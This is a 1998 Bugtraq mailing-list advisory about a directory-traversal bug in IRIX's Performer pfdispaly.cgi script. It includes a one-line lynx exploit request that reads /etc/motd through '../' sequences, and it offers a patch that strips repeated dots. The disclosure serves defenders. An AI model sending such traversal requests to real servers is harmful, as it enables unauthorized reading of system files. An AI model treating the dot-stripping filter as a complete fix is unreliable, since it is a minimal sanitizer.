Date: Tue, 17 Mar 1998 00:06:48 +0100
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: IRIX performer_tools bug

    Do you remember the /cgi-bin/handler bug?

    Well, more of the same:

    Software:
    IRIX 6.2
    performer_tools.sw.webtools (Performer API Search Tool 2.2)
    /var/www/cgi-bin/pfdispaly.cgi

    Bug: Anyone can read files (as 'nobody') from your system:

    Exploit:

    lynx -source \
    'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

    for instance :-)


    Fix:

*** pfdispaly.cgi.O     Mon Mar 16 23:13:34 1998
--- pfdispaly.cgi       Mon Mar 16 23:36:29 1998
***************
*** 14,19 ****
--- 14,20 ----
  $fullcgiroot = "/var/www$cgiroot";

  $shortfilepath = "$ARGV[0]";
+ $shortfilepath =~ s/\.{2,}//g;
  $fullfilepath = "$maindocroot$shortfilepath";
  ($filename = $shortfilepath) =~ s/.*\/(.*)$/$1/;



    Note: I haven't tested the other Performer CGI's too much,
    maybe they will have more nasty bugs.
    (in fact, pfdispaly.cgi opens "$ARGV[0]" with "$maindocroot"
    prepended; but somewhere 'dangerous' characters are escaped)

    There is another bug at pfsearch.cgi; which lacks of
    a
    print "Content-type: text/html\n\n";
    line, so you get garbage in your browser.

    (and even worse, you have to enable JavaScript if you want
    to use this set of CGIs...)


--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)